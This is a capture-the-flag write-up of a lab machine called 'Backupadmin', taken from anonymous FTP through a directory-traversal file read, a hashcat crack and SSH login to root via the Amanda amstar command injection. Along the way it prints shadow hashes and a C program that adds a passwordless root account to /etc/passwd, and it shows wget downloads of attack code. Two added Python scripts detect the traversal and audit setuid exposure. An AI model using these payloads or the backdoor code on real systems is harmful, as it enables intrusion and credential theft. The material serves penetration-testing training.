
VHL — Backupadmin

FTP server with anonymous access exposes backup credentials. Password reuse leads to SSH login and privilege escalation.

February 8, 2025, Virtual Hacking Labs
#FTP #Anonymous Login #Password Reuse #SSH

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 13:22 EST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 13:23 (0:00:06 remaining)
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 13:23 (0:00:06 remaining)
Nmap scan report for 10.11.1.4
Host is up (0.022s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0           32540 Jul 13  2022 backupdirs.txt
22/tcp    open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 64:77:04:9b:7b:39:02:78:04:19:90:90:32:a9:58:32 (RSA)
|   256 af:2e:70:d5:fd:44:44:f1:e0:13:57:c1:81:ac:b0:14 (ECDSA)
|_  256 84:53:0e:f2:39:02:fd:d6:8d:2f:23:c3:7e:f0:d7:7b (ED25519)
80/tcp    open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10080/tcp open  amanda?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/8%OT=21%CT=1%CU=42193%PV=Y%DS=2%DC=I%G=Y%TM=67A7A
OS:141%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP
OS:=106%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%II=I%TS=
OS:A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5
OS:B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE8
OS:8)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: BACKUPADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -1m30s
| smb2-time: 
|   date: 2025-02-08T18:22:30
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT      ADDRESS
1   21.83 ms 10.11.1.4
```

21

```sh
21/tcp    open  ftp         vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0           32540 Jul 13  2022 backupdirs.txt
```

```sh
ftp anonymous@10.11.1.4
```

```sh
ftp> ls ../
229 Entering Extended Passive Mode (|||50853|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0           32540 Jul 13  2022 backupdirs.txt
226 Directory send OK.

ftp> get backupdirs.txt
```

80

```sh
80/tcp    open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
```

445

```sh
445/tcp   open  netbios-ssn Samba smbd 4.6.2
```

```sh
smbclient -N -L \\\\10.11.1.4

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share           Disk      Uploads
	IPC$            IPC       IPC Service (backupadmin server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.11.1.4 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
```

PHP File Vault 0.9 - Directory Traversal LFI

  • https://www.exploit-db.com/exploits/40163
  • Since the site runs nginx, the nginx configuration directory is the place to look; its listing contains an htpasswd file:

```txt
./nginx:
conf.d
fastcgi.conf
fastcgi_params
htpasswd
koi-utf
koi-win
mime.types
modules-available
modules-enabled
nginx.conf
proxy_params
scgi_params
sites-available
sites-enabled
snippets
uwsgi_params
win-utf
```

```sh
http://10.11.1.4/fileinfo.php?sha1=../../../../etc/nginx/htpasswd
```
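The traversal above leaves an obvious trace in the web server's access log: a query parameter carrying `../` hops, possibly percent-encoded once or several times. The following is an added example (not code from the original page) that scans nginx "combined"-format log lines for such requests, decoding repeatedly so that `%2e%2e%2f` and double-encoded `%252e%252e%252f` are caught as well as the literal form. The log lines, the client addresses, and the `fileinfo.php`/`sha1` names in them are constructed for the example; only the parameter name and path shape follow the request shown on the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines in nginx's default "combined" format (not taken from the page).
SAMPLE_LOG = """\
10.11.1.100 - - [08/Feb/2025:13:30:01 -0500] "GET /fileinfo.php?sha1=abcdef HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.1.100 - - [08/Feb/2025:13:30:05 -0500] "GET /fileinfo.php?sha1=../../../../etc/nginx/htpasswd HTTP/1.1" 200 98 "-" "curl/8.0"
10.11.1.100 - - [08/Feb/2025:13:30:09 -0500] "GET /fileinfo.php?sha1=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1800 "-" "curl/8.0"
10.11.1.101 - - [08/Feb/2025:13:31:00 -0500] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# A ".." path component delimited by a slash or backslash on either side (or the string ends).
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def is_traversal(value: str) -> bool:
    """True if `value` contains a ../ or ..\\ hop after repeated percent-decoding."""
    decoded = value
    for _ in range(3):  # unwrap up to triple encoding; stop once decoding is a no-op
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return TRAVERSAL_RE.search(decoded) is not None


def find_traversal_requests(log_text: str) -> list:
    """Return one finding per log line whose path or any query value contains a traversal hop."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m['target'])
        params = parse_qs(parts.query, keep_blank_values=True)
        suspicious = sorted(k for k, vals in params.items() if any(is_traversal(v) for v in vals))
        if is_traversal(parts.path):
            suspicious.append('<path>')
        if suspicious:
            hits.append({
                'ip': m['ip'],
                'path': parts.path,
                'params': suspicious,
                'status': int(m['status']),
            })
    return hits


if __name__ == '__main__':
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

A `200` status on a flagged request is the interesting case: the application served something for a traversal argument, which is exactly what happened with `htpasswd` here. Keeping credential files out of any directory the application can be coaxed into reading is the fix on the server side; this check is the detection side.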

hashcat

```sh
hashcat -m 1600 '$apr1$tMyA9cpu$yp0B748Epfcv/No74ohd/0' /usr/share/wordlists/rockyou.txt

$apr1$tMyA9cpu$yp0B748Epfcv/No74ohd/0:0811783909 
```

ssh as backupuser

```sh
ssh backupuser@10.11.1.4
password: 0811783909
```

disk group

```sh
backupuser@backupadmin:~$ id
uid=1002(backupuser) gid=34(backup) groups=34(backup),6(disk),26(tape)
```

```sh
backupuser@backupadmin:~$ df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               933M     0  933M   0% /dev
tmpfs                              196M  2.4M  193M   2% /run
/dev/mapper/ubuntu--vg-ubuntu--lv  9.8G  4.2G  5.1G  46% /
tmpfs                              977M     0  977M   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              977M     0  977M   0% /sys/fs/cgroup
/dev/sda2                          1.5G  106M  1.3G   8% /boot
tmpfs                              196M     0  196M   0% /run/user/1002
```

```sh
backupuser@backupadmin:~$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs:  mkdir test
debugfs:  cat /etc/shadow
backupadmin:$6$owIlrXnDzKDc5AtY$CG6JqxlEvmACPZ4Iok14YHeKXBxBAXXGVmsWiLg/G2aTsgwnXNgxJgG13v0mvlTAHnqjssfjzkP32gdvHszil.:19186:0:99999:7:::
lxd:!:19186::::::
ftp:*:19186:0:99999:7:::
postfix:*:19186:0:99999:7:::
amandabackup:!:19186:0:99999:7:::
backupuser:$6$db5M6MoSF5w2SPDM$kuFNNPhZ.l6MdV.gu5R1Y0XudNpM1oy.epFRdz1qzWRobAA1NZXKcu08QIwicvwneBTwMIgpemQqPmEbe7w6C/:19186:0:99999:7:::
```

```sh
$6$owIlrXnDzKDc5AtY$CG6JqxlEvmACPZ4Iok14YHeKXBxBAXXGVmsWiLg/G2aTsgwnXNgxJgG13v0mvlTAHnqjssfjzkP32gdvHszil.
```

  • With write access to the block device, another option is to write into a `.ssh` directory and add an `authorized_keys` file.

```sh
backupuser@backupadmin:~$ nano authorized_keys
backupuser@backupadmin:~$ ls
authorized_keys  linpeas.sh  pspy64
backupuser@backupadmin:~$ pwd
/home/backupuser
```

  • This might not be the path to root, but membership in the `disk` group already allows reading sensitive files such as `/etc/shadow`, bypassing file permissions entirely.

SUID

```sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-- 1 root disk 11K Feb 21  2012 /usr/libexec/amanda/runtar (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 75K Feb 21  2012 /usr/libexec/amanda/planner (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 11K Feb 21  2012 /usr/libexec/amanda/killpgrp (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 11K Feb 21  2012 /usr/libexec/amanda/rundump (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 56K Feb 21  2012 /usr/libexec/amanda/dumper (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 45K Feb 21  2012 /usr/libexec/amanda/application/amgtar (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 36K Feb 21  2012 /usr/libexec/amanda/application/amstar (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 19K Feb 21  2012 /usr/libexec/amanda/calcsize (Unknown SUID binary!)
-rwsr-xr-x 1 root root 31K Feb 21  2022 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 39K Feb  7  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K Jul 14  2021 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K Jul 14  2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Jul 14  2021 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Jul 14  2021 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K Jul 14  2021 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 67K Feb  7  2022 /usr/bin/su
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 55K Feb  7  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root disk 68K Feb 21  2012 /usr/sbin/amcheck (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 15K Feb 21  2012 /usr/sbin/amservice (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Apr 29  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 30  2022 /usr/lib/openssh/ssh-keysign
```
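Both of the findings above come down to one fact: `backupuser` is in the `disk` group, and that group is both a raw-block-device ticket (the `debugfs` read of `/etc/shadow` earlier) and the group gate on every `-rwsr-xr--` Amanda binary in the listing. The following is an added audit script, not code from the page or from Amanda, that joins an `/etc/group` file with an `ls -l`-style listing and reports, per user in a sensitive group, which setuid-root binaries that membership unlocks. The `/etc/group` content is constructed for the example; the listing lines follow the shape of the page's SUID sweep.

```python
import re

# Constructed sample /etc/group content (not taken from the page).
SAMPLE_GROUP = """\
root:x:0:
disk:x:6:backupuser
tape:x:26:backupuser
backup:x:34:
sudo:x:27:
"""

# Constructed `ls -l` lines in the shape of the page's SUID listing (size/date columns are free text).
SAMPLE_LS = """\
-rwsr-xr-- 1 root disk 11K Feb 21  2012 /usr/libexec/amanda/runtar
-rwsr-xr-- 1 root disk 45K Feb 21  2012 /usr/libexec/amanda/application/amstar
-rwsr-xr-x 1 root root 67K Jul 14  2021 /usr/bin/passwd
-rwsr-xr-- 1 root messagebus 51K Apr 29  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwxr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/ls
"""

# Groups whose membership is effectively a privilege boundary: raw device access (disk, tape),
# shadow file access, container sockets, or sudo itself. Adjust to the distribution in use.
SENSITIVE_GROUPS = {"disk", "tape", "shadow", "docker", "lxd", "adm", "sudo", "wheel"}

LS_RE = re.compile(
    r'^(?P<mode>[-dl][rwxsStT-]{9}) +\d+ +(?P<owner>\S+) +(?P<group>\S+)'
    r' +\S+ +\S+ +\d+ +\S+ +(?P<path>/\S+)'
)


def parse_group_file(text: str) -> dict:
    """Return {group_name: set(supplementary members)} from /etc/group-style text."""
    members = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        name, _passwd, _gid, users = line.split(':', 3)
        members[name] = {u for u in users.split(',') if u}
    return members


def setuid_root_binaries(ls_text: str) -> dict:
    """Return {path: who_can_run} for setuid-root regular files in an ls -l listing.

    who_can_run is 'everyone' when the other-execute bit is set, otherwise the file's
    group when group-execute is set (the group is the gate), otherwise 'root'.
    """
    gate = {}
    for line in ls_text.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        mode = m['mode']
        if mode[0] != '-' or mode[3] not in 'sS' or m['owner'] != 'root':
            continue  # not a regular file, not setuid, or not owned by root
        if mode[9] in 'xt':
            gate[m['path']] = 'everyone'
        elif mode[6] in 'xs':
            gate[m['path']] = m['group']
        else:
            gate[m['path']] = 'root'
    return gate


def privilege_paths(group_text: str, ls_text: str, sensitive=SENSITIVE_GROUPS) -> dict:
    """For each user in a sensitive group, map that group to the setuid-root binaries it gates."""
    groups = parse_group_file(group_text)
    gate = setuid_root_binaries(ls_text)
    findings = {}
    for g, users in groups.items():
        if g not in sensitive or not users:
            continue
        gated = sorted(p for p, who in gate.items() if who == g)
        for u in users:
            findings.setdefault(u, {})[g] = gated
    return findings


if __name__ == '__main__':
    for user, groups in privilege_paths(SAMPLE_GROUP, SAMPLE_LS).items():
        for g, binaries in groups.items():
            print(f"{user}: member of {g!r}; gated setuid-root binaries: {binaries or 'none'}")
```

On a real host, feed it the output of `cat /etc/group` and `find / -perm -4000 -type f -exec ls -l {} +`. An empty list for a group such as `disk` is not a clean result: the group still grants raw access to every mounted block device, which is why the script reports the membership itself, not only the binaries.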

amanda privilege escalation

  • https://www.exploit-db.com/exploits/39217

```sh
backupuser@backupadmin:/var/lib$ ls -al /usr/libexec/amanda/runtar
-rwsr-xr-- 1 root disk 10448 Feb 21  2012 /usr/libexec/amanda/runtar
```

x.c

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(){
        setreuid(0,0);
        setregid(0,0);
        system("echo r00t::0:0::/:/bin/sh >> /etc/passwd");
        exit(0);
}
```

```sh
backupuser@backupadmin:~$ wget http://172.16.1.3/x.c
```

```sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -o x x.c
```

```sh
backupuser@backupadmin:~$ wget http://172.16.1.3/x
```

```sh
backupuser@backupadmin:~$ chmod +x x
```

Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation

  • https://www.exploit-db.com/exploits/39244

```txt
$ id
uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
$ cat /tmp/runme.sh
#!/bin/sh
/bin/sh
$ ls -al /usr/lib/amanda/application/amstar
-rwsr-xr-- 1 root backup 31284 Jul 29  2012 /usr/lib/amanda/application/amstar
$ /usr/lib/amanda/application/amstar restore --star-path=/tmp/runme.sh
# id
uid=0(root) gid=34(backup) groups=0(root),6(disk),26(tape),34(backup)
# uname -a
Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
#
```

```sh
backupuser@backupadmin:/tmp$ nano runme.sh
backupuser@backupadmin:/tmp$ chmod +x runme.sh
```

```sh
backupuser@backupadmin:/tmp$ /usr/libexec/amanda/application/amstar restore --star-path=/tmp/runme.sh
# whoami
root
# cd /root
# cat key.txt
dhj289mlk832GB30fdsd
```

key.txt